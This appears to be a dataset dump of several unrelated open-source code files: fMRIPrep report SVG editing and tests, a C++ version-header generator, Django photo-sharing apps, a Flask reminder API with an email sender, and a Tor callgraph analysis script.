pointRBJ = arcpy.GetParameterAsText(5)
prodWorkspace = arcpy.GetParameterAsText(6)
featureList = arcpy.GetParameterAsText(7)
# module
runDataReview(workspace, spatRef, sessionName, polyRBJ, lineRBJ, pointRBJ, featureList, prodWorkspace)
```
|
{
"source": "JessyD/fmriprep-group-report",
"score": 3
}
|
#### File: fmriprep-group-report/fmriprepgr/_svg_edit.py
```python
from pathlib import Path
def _parse_figure(fig_path):
"""
Parse an fmriprep figure into header, background, middle, foreground, and tail.
Parameters
----------
fig_path: str
Path to the figure to parse
Returns
-------
header: list of str
Lines preceding the background image
background: list of str
Lines corresponding to the background image
middle: list of str
        any lines occurring between the background and foreground lines
foreground: list of str
Lines corresponding to the foreground image
tail: list of str
Lines following the foreground image
"""
fig_path = Path(fig_path)
fig = fig_path.read_text()
fig_lines = fig.split("\n")
header = []
origbg = []
middle = []
origfg = []
tail = []
inhead = True
inorigbg = False
inmiddle = False
inorigfg = False
intail = False
for fl in fig_lines:
if fl.strip() == '<g class="background-svg">':
open_gs = 1
inhead = False
inorigbg = True
origbg.append(fl)
continue
elif fl.strip() == '<g class="foreground-svg">':
open_gs = 1
inmiddle = False
inorigfg = True
origfg.append(fl)
continue
elif inhead:
header.append(fl)
elif inmiddle:
middle.append(fl)
elif intail:
tail.append(fl)
elif inorigbg:
origbg.append(fl)
if '<g ' in fl:
open_gs += 1
if '</g>' in fl:
open_gs -= 1
if open_gs == 0:
inorigbg = False
inmiddle = True
elif inorigfg:
origfg.append(fl)
if '<g ' in fl:
open_gs +=1
if '</g>' in fl:
open_gs -= 1
if open_gs == 0:
inorigfg = False
intail = True
return header, origbg, middle, origfg, tail
def _flip_images(fig_path, new_path):
"""
Flip the foreground and background images
Parameters
----------
fig_path : str
Path to source image
new_path : str
Path for new image
"""
header, origbg, middle, origfg, tail = _parse_figure(fig_path)
new_path = Path(new_path)
newbg = origfg
newbg[0] = newbg[0].replace('foreground', 'background')
newfg = origbg
newfg[0] = newfg[0].replace('background', 'foreground')
new_svg = '\n'.join(header + newbg + middle + newfg + tail)
new_path.write_text(new_svg)
def _drop_image(fig_path, new_path, image_to_drop):
"""
Drop the foreground or background image. The background image is the one displayed before mousing over the svg.
Parameters
----------
fig_path : str
Path to source image
new_path : str
Path for new image
image_to_drop : str
Which image to drop, allowed values are "background", "foreground".
"""
    if image_to_drop not in ['background', 'foreground']:
raise ValueError(f"image_to_drop must be one of ['background', 'foreground'], {image_to_drop} "
f"is not a valid option.")
header, origbg, middle, origfg, tail = _parse_figure(fig_path)
new_path = Path(new_path)
if image_to_drop == 'foreground':
newbg = origfg
newbg[0] = newbg[0].replace('foreground', 'background')
new_svg = '\n'.join(header + newbg + middle + tail)
new_path.write_text(new_svg)
else:
new_svg = '\n'.join(header + origbg + middle + tail)
new_path.write_text(new_svg)
```
#### File: fmriprepgr/test/test_reports.py
```python
from pathlib import Path
from shutil import copytree, rmtree
import numpy as np
import pandas as pd
import pytest
from ..reports import _make_report_snippet, parse_report, make_report
def test_make_report_snippet():
"""
Run `reports._make_report_snippet` and confirm that output is as expected by comparison to output previously stored
in this function.
Returns
-------
None
"""
row = {'idx':0,
'chunk':0,
'subject': '22293',
'acquisition': 'mprage',
'reconstruction': 'prenorm',
'run': 1,
'suffix': 'dseg',
'extension': '.svg',
'path': './sub-22293/figures/sub-22293_acq-mprage_rec-prenorm_run-1_dseg.svg',
'filename': 'sub-22293_acq-mprage_rec-prenorm_run-1_dseg.svg',
'run_title': 'Brain mask and brain tissue segmentation of the T1w',
'elem_caption': 'This panel shows the template T1-weighted image (if several T1w images were found), with contours delineating the detected brain mask and brain tissue segmentations.',
'space': np.nan,
'desc': np.nan,
'session': np.nan,
'task': np.nan,
'report_type': 'dseg'}
expected_output = ['<div id="id-0_filename-sub-22293_acq-mprage_rec-prenorm_run-1_dseg">',
'<script type="text/javascript">',
'var subj_qc = {"idx": 0, "chunk": 0, "subject": "22293", "acquisition": "mprage", "reconstruction": "prenorm", "run": 1, "suffix": "dseg", "space": NaN, "desc": NaN, "session": NaN, "task": NaN, "report_type": "dseg", "been_on_screen": false, "rater": NaN, "report": NaN, "note": NaN}',
'</script>',
'<h2>idx-0: subject <span class="bids-entity">22293</span>, acquisition <span class="bids-entity">mprage</span>, reconstruction <span class="bids-entity">prenorm</span>, run <span class="bids-entity">1</span>, suffix <span class="bids-entity">dseg</span></h2>',
'<div class="radio">',
'<label><input type="radio" name="inlineRadio0" id="inlineRating1" value="1" onclick="qc_update(0, \'report\', this.value)"> Good </label>',
'<label><input type="radio" name="inlineRadio0" id="inlineRating0" value="0" onclick="qc_update(0, \'report\', this.value)"> Bad</label>',
'</div>',
'<p> Notes: <input type="text" id="box0" oninput="qc_update(0, \'note\', this.value)"></p>',
'<object class="svg-reportlet" type="image/svg+xml" data="./sub-22293/figures/sub-22293_acq-mprage_rec-prenorm_run-1_dseg.svg"> </object>',
'</div>',
'<script type="text/javascript">',
'subj_qc["report"] = -1',
'subjs.push(subj_qc)',
'</script>'
]
output = _make_report_snippet(row)
output = [oo.strip() for oo in output.split('\n') if len(oo.strip()) > 0]
assert np.all([aa == bb for aa,bb in zip(expected_output, output)])
def test_parse_report():
"""
Run `reports.parse_report` on sub-20900test.html and confirm that output is as expected by comparison to previously
saved output.
Returns
-------
None
"""
test_data_dir = Path(__file__).parent.resolve() / 'data'
output = parse_report(test_data_dir / 'fmriprep/sub-20900.html')
expected_output = pd.read_csv(test_data_dir / 'sub-20900test.csv')
expected_output['subject'] = expected_output.subject.astype(str)
assert expected_output.equals(output)
def test_make_report(tmp_path):
test_out_dir = tmp_path
test_data_dir = Path(__file__).parent.resolve() / 'data/fmriprep'
test_fmriprep_dir = test_out_dir / 'fmriprep'
copytree(test_data_dir, test_out_dir / 'fmriprep')
with pytest.raises(ValueError):
ret = make_report([test_fmriprep_dir.as_posix()])
def test_fmriprepgr(tmp_path, script_runner):
test_out_dir = tmp_path
test_data_dir = Path(__file__).parent.resolve() / 'data/fmriprep'
test_fmriprep_dir = test_out_dir / 'fmriprep'
copytree(test_data_dir, test_fmriprep_dir)
# get rid of the expected outputs
rmtree(test_fmriprep_dir / 'group')
ret = script_runner.run('fmriprepgr', test_fmriprep_dir.as_posix())
assert ret.success
expected_out_dir = test_data_dir / 'group'
out_dir = test_fmriprep_dir / 'group'
expected_files = sorted(expected_out_dir.glob('*'))
out_files = sorted(out_dir.glob('*'))
expected_file_names = np.array([pp.parts[-1] for pp in expected_files])
out_file_names = np.array([pp.parts[-1] for pp in out_files])
assert (expected_file_names == out_file_names).all()
# test that html files are generated correctly
for of, ef in zip(out_files, expected_files):
if ef.as_posix().split('.')[-1] == 'html':
econtent = ef.read_text()
ocontent = of.read_text()
assert ocontent == econtent
# test that links are valid
out_links = sorted((out_dir / 'sub-20900' / 'figures').glob('*'))
out_links += sorted((out_dir / 'sub-22293' / 'figures').glob('*'))
for ll in out_links:
assert ll.exists()
def test_fmriprepgr_batches(tmp_path, script_runner):
test_out_dir = tmp_path
test_data_dir = Path(__file__).parent.resolve() / 'data/fmriprep'
test_fmriprep_dir = test_out_dir / 'fmriprep'
copytree(test_data_dir, test_fmriprep_dir)
# get rid of the expected outputs
rmtree(test_fmriprep_dir / 'group')
ret = script_runner.run('fmriprepgr', '--reports_per_page=1', test_fmriprep_dir.as_posix())
assert ret.success
expected_out_dir = test_data_dir / 'group_batch'
out_dir = test_fmriprep_dir / 'group'
expected_files = sorted(expected_out_dir.glob('*'))
out_files = sorted(out_dir.glob('*'))
expected_file_names = np.array([pp.parts[-1] for pp in expected_files])
out_file_names = np.array([pp.parts[-1] for pp in out_files])
assert (expected_file_names == out_file_names).all()
# test that html files are generated correctly
for of, ef in zip(out_files, expected_files):
if ef.as_posix().split('.')[-1] == 'html':
econtent = ef.read_text()
ocontent = of.read_text()
assert ocontent == econtent
# test that links are valid
out_links = sorted((out_dir / 'sub-20900' / 'figures').glob('*'))
out_links += sorted((out_dir / 'sub-22293' / 'figures').glob('*'))
for ll in out_links:
assert ll.exists()
def test_fmriprepgr_mod(tmp_path, script_runner):
test_out_dir = tmp_path
test_data_dir = Path(__file__).parent.resolve() / 'data/fmriprep'
test_fmriprep_dir = test_out_dir / 'fmriprep'
copytree(test_data_dir, test_fmriprep_dir)
# get rid of the expected outputs
rmtree(test_fmriprep_dir / 'group')
ret = script_runner.run('fmriprepgr', '-f MNI152NLin6Asym', '--drop_background=pepolar', test_fmriprep_dir.as_posix())
assert ret.success
expected_out_dir = test_data_dir / 'group_mod'
out_dir = test_fmriprep_dir / 'group'
expected_files = sorted(expected_out_dir.glob('*'))
out_files = sorted(out_dir.glob('*'))
expected_file_names = np.array([pp.parts[-1] for pp in expected_files])
out_file_names = np.array([pp.parts[-1] for pp in out_files])
assert (expected_file_names == out_file_names).all()
# test that html files are generated correctly
for of, ef in zip(out_files, expected_files):
if ef.as_posix().split('.')[-1] in ['html', 'svg']:
econtent = ef.read_text()
ocontent = of.read_text()
assert ocontent == econtent
# test that links are valid
out_links = sorted((out_dir / 'sub-20900' / 'figures').glob('*'))
out_links += sorted((out_dir / 'sub-22293' / 'figures').glob('*'))
for ll in out_links:
assert ll.exists()
```
#### File: fmriprepgr/test/test_svg_edit.py
```python
from pathlib import Path
from .._svg_edit import _flip_images, _drop_image
def test_flip(tmp_path):
orig_path = (Path(__file__).parent.resolve()
/ 'data/svg_edit/sub-22293_acq-mprage_rec-prenorm_run-1_space-MNI152NLin6Asym_T1w.svg')
new_path = tmp_path / 'flipped.svg'
expected_path = (Path(__file__).parent.resolve()
/ 'data/svg_edit/sub-22293_acq-mprage_rec-prenorm_run-1_space-MNI152NLin6Asym_T1w_flipped.svg')
_flip_images(orig_path, new_path)
expected_svg = expected_path.read_text()
output_svg = new_path.read_text()
assert expected_svg == output_svg
def test_dropfg(tmp_path):
orig_path = (Path(__file__).parent.resolve()
/ 'data/svg_edit/sub-22293_acq-mprage_rec-prenorm_run-1_space-MNI152NLin6Asym_T1w.svg')
new_path = tmp_path / 'dropfg.svg'
expected_path = (Path(__file__).parent.resolve()
/ 'data/svg_edit/sub-22293_acq-mprage_rec-prenorm_run-1_space-MNI152NLin6Asym_T1w_dropfg.svg')
_drop_image(orig_path, new_path, 'foreground')
expected_svg = expected_path.read_text()
output_svg = new_path.read_text()
assert expected_svg == output_svg
def test_dropbg(tmp_path):
orig_path = (Path(__file__).parent.resolve()
/ 'data/svg_edit/sub-22293_acq-mprage_rec-prenorm_run-1_space-MNI152NLin6Asym_T1w.svg')
new_path = tmp_path / 'dropbg.svg'
expected_path = (Path(__file__).parent.resolve()
/ 'data/svg_edit/sub-22293_acq-mprage_rec-prenorm_run-1_space-MNI152NLin6Asym_T1w_dropbg.svg')
_drop_image(orig_path, new_path, 'background')
expected_svg = expected_path.read_text()
output_svg = new_path.read_text()
assert expected_svg == output_svg
```
|
{
"source": "JessyDL/psl",
"score": 2
}
|
#### File: psl/tools/generate_project_info.py
```python
import versioning
import os
from datetime import datetime
def generate(filepath, force = False):
major, minor, patch = versioning.git_version()
sha1 = versioning.git_sha1()
unix_timestamp = versioning.git_timestamp()
utc_timestamp = datetime.utcfromtimestamp(unix_timestamp).strftime('%Y-%m-%d %H:%M:%S')
authors = versioning.all_authors()
if os.path.exists(filepath) and not force:
fObj = open(filepath, 'r')
content = fObj.read()
if f"// generated from commit sha1 {sha1}." in content:
print("header file up to date")
return
print("header file out of date, updating...")
fObj.close()
fObj = open(filepath, 'w+')
fObj.write("// *****************************************************************************\n")
fObj.write("// generated header file don't edit.\n")
fObj.write("// edit `tools/versioning.py` instead.\n")
fObj.write(f"// generated from commit sha1 {sha1}.\n")
fObj.write("// *****************************************************************************\n")
fObj.write("#include <psl/types.hpp>\n")
fObj.write("#include <string_view>\n")
fObj.write("#include <array>\n")
fObj.write(
'''
/**
* @brief root library namespace
* @details the entire Paradigm Standard Library lives in this namespace.
* Rarely some free functions might be declared, but they will likely be limited in scope to a certain constraint (like
* `enum.hpp')
*
*/
''')
fObj.write('namespace psl\n')
fObj.write('{\n')
fObj.write(f'\tconstexpr std::string_view VERSION_TIME_UTC {{ "{utc_timestamp}" }};\n')
fObj.write(f'\tconstexpr std::string_view VERSION_SHA1 {{ "{sha1}" }};\n')
fObj.write(f'\tconstexpr std::string_view VERSION_FULL {{ "{major}.{minor}.{patch}.{sha1}" }};\n')
fObj.write(f'\tconstexpr ui64 VERSION_TIME_UNIX {{ {unix_timestamp} }};\n')
fObj.write(f'\tconstexpr ui32 VERSION_MAJOR {{ {major} }};\n')
fObj.write(f'\tconstexpr ui32 VERSION_MINOR {{ {minor} }};\n')
fObj.write(f'\tconstexpr ui32 VERSION_PATCH {{ {patch} }};\n')
fObj.write( '\tconstexpr ui32 VERSION {((VERSION_MAJOR << 22) | (VERSION_MINOR << 12) | VERSION_PATCH)};\n')
fObj.write( '\n')
fObj.write("\tconstexpr static std::array<std::string_view, "+str(len(authors))+ "> PROJECT_CREDITS\n\t{{\n")
for i, author in enumerate(authors):
if i < len(authors) - 1:
fObj.write('\t\t"' + author + '",\n')
else:
fObj.write('\t\t"' + author + '"')
fObj.write("\n\t}};\n")
fObj.write('}\n')
#fObj.write("constexpr static psl::string8::view APPLICATION_FULL_NAME {\"PSL "+ version + "." +sha1+ " "+ utc_timestamp +"\"};\n")
fObj.truncate()
fObj.close()
if __name__ == "__main__":
generate(os.path.dirname(os.path.realpath(__file__)) +"/../include/psl/psl.hpp", True)
```
|
{
"source": "je-ss-y/Gallero",
"score": 3
}
|
#### File: Gallero/pictures/models.py
```python
from django.db import models
# Create your models here.
class Category(models.Model):
category_name = models.CharField(max_length =30)
def __str__(self):
return self.category_name
def save_category(self):
self.save()
class Meta:
ordering = ['category_name']
class Location(models.Model):
location_name = models.CharField(max_length =30)
def __str__(self):
return self.location_name
def save_location(self):
self.save()
class Image(models.Model):
image_name = models.CharField(max_length =30)
image_description = models.TextField()
category = models.ForeignKey(Category, db_column='category_name')
location = models.ManyToManyField(Location)
image = models.ImageField(upload_to = 'imagepath/')
@classmethod
def search_by_category(cls,search_term):
pictures = cls.objects.filter(category__category_name__contains=search_term)
return pictures
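    # Hypothetical usage from a view (the category name is illustrative):
    #   nature_pics = Image.search_by_category('nature')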
```
|
{
"source": "je-ss-y/Insta-memories",
"score": 2
}
|
#### File: Insta-memories/posts/models.py
```python
from django.db import models
from django.contrib.auth.models import User
from tinymce.models import HTMLField
# Create your models here.
class Image(models.Model):
image= models.ImageField(upload_to='images/', blank=True)
photoname = models.TextField()
caption = HTMLField()
# upvote = models.ManyToManyField(User)
user = models.ForeignKey(User,on_delete=models.CASCADE)
pub_date = models.DateTimeField(auto_now_add=True)
# profile = models.ForeignKey(Profile,on_delete=models.CASCADE)
# tags = models.ManyToManyField(tags)
def __str__(self):
        return str(self.image)
    def save_image(self):
        self.save()
def delete_image(self):
self.delete()
@classmethod
def search_by_name(cls,search_term):
searched_user = cls.objects.filter(user__username__contains=search_term)
return searched_user
@classmethod
def get_image(cls):
image= cls.objects.all().prefetch_related('comment_set')
return image
class Profile(models.Model):
user = models.OneToOneField(User,on_delete=models.CASCADE,related_name='profile')
bio = models.TextField()
profilepicture= models.ImageField(upload_to='profile/', blank=True)
def __str__(self):
        return str(self.profilepicture)
    def save_profile(self):
        self.save()
def delete_profile(self):
self.delete()
class Comment(models.Model):
comment = models.TextField()
image = models.ForeignKey(Image, on_delete=models.CASCADE)
user = models.ForeignKey(User, on_delete=models.CASCADE)
def __str__(self):
return self.comment
```
#### File: Insta-memories/posts/tests.py
```python
from django.test import TestCase
from .models import Image,Profile,Comment
from django.contrib.auth.models import User
# Create your tests here.
class ImageTestClass(TestCase):
# set up method
def setUp(self):
self.user=User.objects.create(username='jessy')
# self.profile=Profile.objects.create(id=1,user=jessica,bio=creating,profile_photo="")
self.image=Image(image='https://www.italymagazine.com/sites/default/files/styles/624xauto/public/feature-story/leader/bolzano-lead.jpg?itok=SsNNvkdk',photoname='person',caption='hello', pub_date='2019-9-2')
#testing instance
def test_instance(self):
        self.assertTrue(isinstance(self.image, Image))
        # self.assertTrue(isinstance(self.profile, Profile))
        self.assertTrue(isinstance(self.user, User))
def save_instance(self):
self.image.save_image()
images=Image.objects.all()
        self.assertTrue(len(images) > 0)
class ProfileClass(TestCase):
# set up method
def setUp(self):
        self.user = User.objects.create(username='jessica')
        self.profile = Profile.objects.create(id=1, user=self.user, bio='creating', profilepicture="https://www.italymagazine.com/sites/default/files/styles/624xauto/public/feature-story/leader/bolzano-lead.jpg?itok=SsNNvkdk")
#testing instance
def test_instance(self):
        self.assertTrue(isinstance(self.profile, Profile))
def save_instance(self):
        self.profile.save_profile()
        profiles = Profile.objects.all()
        self.assertTrue(len(profiles) > 0)
```
#### File: Insta-memories/posts/views.py
```python
from django.shortcuts import render,redirect
from django.http import HttpResponse,Http404
import datetime as dt
from .models import Image,Profile,Comment
from django.contrib.auth.decorators import login_required
from .forms import NewImageForm,ProfileForm,CommentForm
from django.contrib.auth.forms import UserCreationForm
from registration.backends.simple.views import RegistrationView
from django.contrib.auth.models import User
@login_required(login_url='/accounts/login/')
def new_post(request):
current_user = request.user
if request.method == 'POST':
form = NewImageForm(request.POST, request.FILES)
if form.is_valid():
article = form.save(commit=False)
article.user = current_user
article.save()
return redirect('postsToday')
else:
form =NewImageForm()
return render(request, 'all-posts/onepost.html', {"form": form})
# Create your views here.
@login_required(login_url='/accounts/login/')
def posts_of_day(request):
current_user = request.user
date = dt.date.today()
images = Image.get_image()
comment = Comment.objects.all()
for image in images:
comments = Comment.objects.filter(image=image)
print(comments)
# comment = Comment.objects.filter(id = current_user.id).first()
# print(comment)
return render(request, 'all-posts/posts-today.html', {"date": date,"images": images, 'comments':comments})
# View Function to present posts from past days
def past_days_posts(request, past_date):
try:
# Converts data from the string Url
date = dt.datetime.strptime(past_date, '%Y-%m-%d').date()
except ValueError:
# Raise 404 error when ValueError is thrown
raise Http404()
assert False
if date == dt.date.today():
        return redirect('postsToday')
return render(request, 'all-posts/past-posts.html', {"date": date})
@login_required(login_url='/accounts/login/')
def profile_form(request):
current_user = request.user
if request.method == 'POST':
form = ProfileForm(request.POST, request.FILES)
if form.is_valid():
profile = form.save(commit=False)
profile.user = current_user
profile.save()
return redirect('profile')
else:
form = ProfileForm()
return render(request, 'all-posts/profile.html', {"form": form})
@login_required(login_url='/accounts/login/')
def user_profile(request):
current_user = request.user
images = Image.objects.filter(user=current_user)
profilepicture=Profile.objects.get(user=current_user)
return render(request, 'all-posts/profiledisplay.html', {"profilepicture": profilepicture,"images":images})
def search_results(request):
if 'username' in request.GET and request.GET["username"]:
search_term = request.GET.get("username")
searched_users= Image.search_by_name(search_term)
message = f"{search_term}"
return render(request, 'all-posts/search.html',{"searched_users": searched_users})
else:
message = "You haven't searched for any term"
return render(request, 'all-posts/search.html',{"message":message})
# def register(request):
# if request.method == 'POST':
# form = UserCreationForm(request.POST)
# if form.is_valid():
# form.save()
# return redirect('profiledisplay')
# else:
# form = UserCreationForm()
# args={"form":form}
# return render(request, 'registration/registration_form.html', {"form": form})
@login_required(login_url='/accounts/login/')
def commenting(request,image_id):
current_user = request.user
if request.method == 'POST':
imagetocomment = Image.objects.filter(id = image_id).first()
# user = User.objects.filter(user = current_user.id).first()
# print(user)
form = CommentForm(request.POST, request.FILES)
if form.is_valid():
comment = form.save(commit=False)
comment.user= current_user
comment.image =imagetocomment
comment.save()
return redirect('postsToday')
else:
form = CommentForm()
return render(request, 'all-posts/comment-form.html', {"form": form, 'image_id':image_id})
```
|
{
"source": "JessyLeal/flyfood",
"score": 3
}
|
#### File: flyfood/genetic-algorithm-flyfood/in_data.py
```python
file = open('teste.txt', 'r')
def in_data():
"""Na funçao `in_data` é tratado os dados da matriz lida do arquivo txt."""
points = {}
i, j = map(int, file.readline().split(' '))
for l in range(i):
line = file.readline().split(' ')
if len(line)==j:
for colun in range(len(line)):
if line[colun].find("\n")!= -1:
line[colun] = line[colun][-2]
if line[colun] not in '0' :
points[line[colun]] = (l, colun)
else:
            raise ValueError('Inconsistent number of columns in line.')
return points
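# A minimal illustration of the expected 'teste.txt' layout (grid contents are
# hypothetical): the first line gives "rows cols", the grid follows, and every
# cell other than '0' becomes a named point keyed by its character.
#   4 5
#   0 0 0 0 D
#   0 A 0 0 0
#   0 0 0 C 0
#   R 0 B 0 0
# in_data() would then return
#   {'D': (0, 4), 'A': (1, 1), 'C': (2, 3), 'R': (3, 0), 'B': (3, 2)}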
```
|
{
"source": "JessYu-1011/Flask-Vue-Reminder",
"score": 3
}
|
#### File: app/apis/subjects_api.py
```python
from app import db
from flask_restx import Resource, fields, Namespace
from app.models import Subjects, SubjectNames
from app.schema import *
from datetime import datetime
from sqlalchemy.exc import IntegrityError
api = Namespace('subjects', 'Subjects Related Method')
# The format to output data
subject_output_data = api.model('output', {
'id': fields.Integer,
'subject_name': fields.String('name'),
'hw_detail': fields.String('description'),
'reminding_time': fields.String('reminding_time'),
'reminding_date': fields.String('reminding_date'),
'modify_time': fields.DateTime(dt_format='iso8601'),
'pages': fields.String('pages')
})
# The format to input data
subject_input_data = api.model('input', {
'name': fields.String('name'),
'detail': fields.String('description'),
'pages': fields.String('pages'),
'reminding_time': fields.String('time'),
'reminding_date': fields.String('reminding_date'),
})
# For frontend to create a list
@api.route('/info')
class SubjectsInfo(Resource):
@api.marshal_with(subject_output_data)
def get(self):
subjects = Subjects.query.filter_by(done=False).order_by(Subjects.id).all()
subject_output = subjects_schema.dump(subjects)
return subject_output
# To modify each id detail
@api.route('/modify/<int:subject_id>')
class SubjectModify(Resource):
@api.marshal_with(subject_output_data)
def get(self, subject_id):
subject = Subjects.query.filter_by(id=subject_id, done=False).first()
subject_output = subject_schema.dump(subject)
return subject_output
@api.expect(subject_input_data)
@api.marshal_with(subject_output_data)
def put(self, subject_id):
subject = Subjects.query.filter_by(id=subject_id).first()
body = api.payload
data = body['data']
subject.subject_name = data['name']
subject.hw_detail = data['detail']
subject.reminding_time = data['reminding_time']
subject.reminding_date = data['reminding_date']
subject.pages = data['pages']
db.session.add(subject)
db.session.commit()
def delete(self, subject_id):
subject = Subjects.query.filter_by(id=subject_id).first()
db.session.delete(subject)
db.session.commit()
# To create a new data
@api.route('/create')
class SubjectCreate(Resource):
@api.expect(subject_input_data)
@api.marshal_with(subject_output_data)
def post(self):
# frontend will send the body to backend
'''
It will be like
headers: {'Content-Type': 'application/json'},
data: {'name': 'xxx', 'pages': 'xxx', 'detail': 'xxxx', 'reminding_time': 'xxx'}
'''
body = api.payload
data = body['data']
# Time must be a String
# It just have " %Y-%m-%d %H:%M"
subject = Subjects(subject_name=data['name'],
hw_detail=data['detail'],
reminding_time=data['reminding_time'],
reminding_date=data['reminding_date'],
pages=data['pages'])
db.session.add(subject)
db.session.commit()
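# A hypothetical client call to the create endpoint (host and field values are
# illustrative, assuming the namespace is mounted at /subjects):
#   requests.post('http://localhost:5000/subjects/create', json={'data': {
#       'name': 'Math', 'detail': 'Exercises 1-5', 'pages': '10-20',
#       'reminding_time': '18:00', 'reminding_date': '2021-05-01'}})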
subject_names_output_data = api.model('subject_names_output', {
"id": fields.String('subject_names_id'),
"subject_name": fields.String('subject_names_name')
})
subject_names_input_data = api.model('subject_names_input', {
"subject_name": fields.String('subject_names_name')
})
@api.route('/subject_names_list')
class SubjectNamesListInfo(Resource):
def get(self):
data = SubjectNames.query.order_by(SubjectNames.id).all()
subject_name_output = subject_names_schema.dump(data)
return subject_name_output
@api.expect(subject_names_input_data)
@api.marshal_with(subject_names_output_data)
def post(self):
body = api.payload
data = body['data']
subject_name = SubjectNames(subject_name=data['subject_name'])
# The subject_name column is unique, so if it has been set already
        # it will cause the exception
try:
db.session.add(subject_name)
db.session.commit()
except IntegrityError:
return "The value has been set"
@api.expect(subject_names_input_data)
def delete(self):
data = api.payload
subject_name = SubjectNames.query.filter_by(subject_name=data['subject_name']).first()
db.session.delete(subject_name)
db.session.commit()
@api.route('/subject_names_list/<int:id>')
class SubjectNamesListModification(Resource):
@api.expect(subject_names_input_data)
@api.marshal_with(subject_names_output_data)
def put(self, id):
subject_name = SubjectNames.query.filter_by(id=id).first()
body = api.payload
data = body['data']
subject_name.subject_name = data['subject_name']
db.session.add(subject_name)
db.session.commit()
```
#### File: migrations/versions/4085680c4ce9_.py
```python
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '4085680c4ce9'
down_revision = '4<PASSWORD>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('users',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('username', sa.String(length=40), nullable=False),
sa.Column('email', sa.String(length=50), nullable=False),
sa.Column('password', sa.String(length=128), nullable=False),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('email'),
sa.UniqueConstraint('username')
)
op.add_column('subjects', sa.Column('user', sa.Integer(), nullable=False))
op.create_foreign_key(None, 'subjects', 'users', ['user'], ['id'])
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_constraint(None, 'subjects', type_='foreignkey')
op.drop_column('subjects', 'user')
op.drop_table('users')
# ### end Alembic commands ###
```
#### File: Flask-Vue-Reminder/tasks/mail.py
```python
import smtplib
# Non ASCII
from email.mime.text import MIMEText
from config import Config
MAIL_ACCOUNT = Config.MAIL_ACCOUNT
TO_ADDR = Config.TO_ADDR
MAIL_PASSWORD = Config.MAIL_PASSWORD
# Send email function
def send_email(subject_name, pages, detail, reminding_time):
# Email content
mime=MIMEText(f"{subject_name} ready to start!!\nPages: {pages}\nDetail: {detail}",
"plain",
"utf-8"
)
# Email subject
mime["Subject"] = f"{subject_name} Reminding"
# Email from address
mime["From"] = MAIL_ACCOUNT
# Email to address
mime["TO"] = TO_ADDR
# Transfer to string
msg = mime.as_string()
smtp = smtplib.SMTP('smtp.gmail.com', 587)
# Register SMTP server
smtp.ehlo()
# Use TLS
smtp.starttls()
smtp.login(MAIL_ACCOUNT, MAIL_PASSWORD)
from_addr = MAIL_ACCOUNT
to_addr = TO_ADDR
status = smtp.sendmail(from_addr, to_addr, msg)
if status == {}:
print("SUCCESS")
else:
print("FAILED")
smtp.quit()
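# A hypothetical call (the recipient comes from Config.TO_ADDR; the argument
# values are illustrative):
#   send_email("Math", "p. 10-20", "Exercises 1-5", "18:00")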
```
|
{
"source": "jesszwang/throttle-tor",
"score": 3
}
|
#### File: scripts/maint/analyze_callgraph.py
```python
import re
import sys
import copy
import cPickle
import os
class Parser:
def __init__(self):
self.calls = {}
def enter_func(self, name):
if self.infunc and not self.extern:
self.calls.setdefault(self.infunc, set()).update( self.calledfns )
self.calledfns = set()
self.infunc = name
self.extern = False
def parse_callgraph_file(self, inp):
self.infunc = None
self.extern = False
self.calledfns = set()
for line in inp:
m = re.match(r"Call graph node for function: '([^']+)'", line)
if m:
self.enter_func(m.group(1))
continue
m = re.match(r" CS<[^>]+> calls external node", line)
if m:
self.extern = True
m = re.match(r" CS<[^>]+> calls function '([^']+)'", line)
if m:
self.calledfns.add(m.group(1))
self.enter_func(None)
def extract_callgraph(self):
c = self.calls
self.calls = {}
return c
def transitive_closure(g):
passno = 0
changed = True
g = copy.deepcopy(g)
import random
while changed:
passno += 1
changed = False
keys = g.keys()
idx = 0
for k in keys:
idx += 1
print "Pass %d/?: %d/%d\r" %(passno, idx, len(keys)),
sys.stdout.flush()
newset = g[k].copy()
for fn in g[k]:
newset.update(g.get(fn, set()))
if len(newset) != len(g[k]):
g[k].update( newset )
changed = True
print
return g
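# For example, with an illustrative call graph,
#   transitive_closure({'a': {'b'}, 'b': {'c'}, 'c': set()})
# returns {'a': {'b', 'c'}, 'b': {'c'}, 'c': set()}: each function now maps to
# every function reachable from it.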
def strongly_connected_components(g):
# From https://en.wikipedia.org/wiki/Tarjan%27s_strongly_connected_components_algorithm, done stupidly.
index_of = {}
index = [ 0 ]
lowlink = {}
S = []
onStack = set()
all_sccs = []
def strongconnect(fn):
index_of[fn] = index[0]
lowlink[fn] = index[0]
index[0] += 1
S.append(fn)
onStack.add(fn)
for w in g.get(fn, []):
if w not in index_of:
strongconnect(w)
lowlink[fn] = min(lowlink[fn], lowlink[w])
elif w in onStack:
lowlink[fn] = min(lowlink[fn], index_of[w])
if lowlink[fn] == index_of[fn]:
this_scc = []
all_sccs.append(this_scc)
while True:
w = S.pop()
onStack.remove(w)
this_scc.append(w)
if w == fn:
break
for v in g.keys():
if v not in index_of:
strongconnect(v)
return all_sccs
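# For example, with an illustrative call graph,
#   strongly_connected_components({'a': {'b'}, 'b': {'a'}, 'c': set()})
# returns [['b', 'a'], ['c']]: 'a' and 'b' call each other, so they collapse
# into a single component (ordering of components and members may vary).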
def biggest_component(sccs):
return max(len(c) for c in sccs)
def connection_bottlenecks(callgraph):
callers = {}
for fn in callgraph:
for fn2 in callgraph[fn]:
callers.setdefault(fn2, set()).add(fn)
components = strongly_connected_components(callgraph)
components.sort(key=len)
big_component_fns = components[-1]
size = len(big_component_fns)
function_bottlenecks = fn_results = []
total = len(big_component_fns)
idx = 0
for fn in big_component_fns:
idx += 1
print "Pass 1/3: %d/%d\r"%(idx, total),
sys.stdout.flush()
cg2 = copy.deepcopy(callgraph)
del cg2[fn]
fn_results.append( (size - biggest_component(strongly_connected_components(cg2)), fn) )
print
bcf_set = set(big_component_fns)
call_bottlenecks = fn_results = []
result_set = set()
total = len(big_component_fns)
idx = 0
for fn in big_component_fns:
fn_callers = callers[fn].intersection(bcf_set)
idx += 1
if len(fn_callers) != 1:
continue
print "Pass 2/3: %d/%d\r"%(idx, total),
sys.stdout.flush()
caller = fn_callers.pop()
assert len(fn_callers) == 0
cg2 = copy.deepcopy(callgraph)
